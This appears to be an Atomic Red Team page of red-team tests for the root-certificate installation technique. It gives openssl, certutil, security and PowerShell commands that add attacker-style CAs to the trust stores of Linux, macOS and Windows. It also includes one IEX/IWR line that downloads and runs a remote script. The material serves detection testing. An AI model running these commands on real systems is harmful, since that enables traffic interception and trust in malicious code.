Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide Adversary-in-the-Middle capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)
Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)
In macOS, the Ay MaMi malware uses
/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert
to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)
Creates a root CA with openssl
Supported Platforms: Linux
auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e
Name | Description | Type | Default Value |
---|---|---|---|
cert_filename | Path of the CA certificate we create | path | rootCA.crt |
key_filename | Key we create that is used to create the CA certificate | path | rootCA.key |
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
cp #{cert_filename} /etc/pki/ca-trust/source/anchors/
update-ca-trust
rm /etc/pki/ca-trust/source/anchors/#{cert_filename}
update-ca-trust
Creates a root CA with openssl
Supported Platforms: Linux
auto_generated_guid: f4568003-1438-44ab-a234-b3252ea7e7a3
Name | Description | Type | Default Value |
---|---|---|---|
cert_filename | Path of the CA certificate we create | path | rootCA.crt |
key_filename | Key we create that is used to create the CA certificate | path | rootCA.key |
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
cp #{cert_filename} /usr/local/share/certs/
certctl rehash
rm /usr/local/share/certs/#{cert_filename}
certctl rehash
Creates a root CA with openssl
Supported Platforms: Linux
auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff
Name | Description | Type | Default Value |
---|---|---|---|
cert_filename | CA file name | path | rootCA.crt |
key_filename | Key we create that is used to create the CA certificate | path | rootCA.key |
mv #{cert_filename} /usr/local/share/ca-certificates
echo sudo update-ca-certificates
if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
Creates a root CA with openssl
Supported Platforms: macOS
auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49
Name | Description | Type | Default Value |
---|---|---|---|
cert_filename | CA file name | path | rootCA.crt |
key_filename | Key we create that is used to create the CA certificate | path | rootCA.key |
sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
Creates a root CA with Powershell
Supported Platforms: Windows
auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
Name | Description | Type | Default Value |
---|---|---|---|
pfx_path | Path of the certificate | path | rootCA.cer |
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root"
try {
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
}
catch { }
if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
Creates a root CA with certutil
Supported Platforms: Windows
auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f
Name | Description | Type | Default Value |
---|---|---|---|
pfx_path | Path of the certificate | path | $env:Temp\rootCA2.cer |
certutil -addstore my #{pfx_path}
try {
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
} catch { }
if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
Supported Platforms: Windows
auto_generated_guid: ca20a3f1-42b5-4e21-ad3f-1049199ec2e0
IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing)
Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item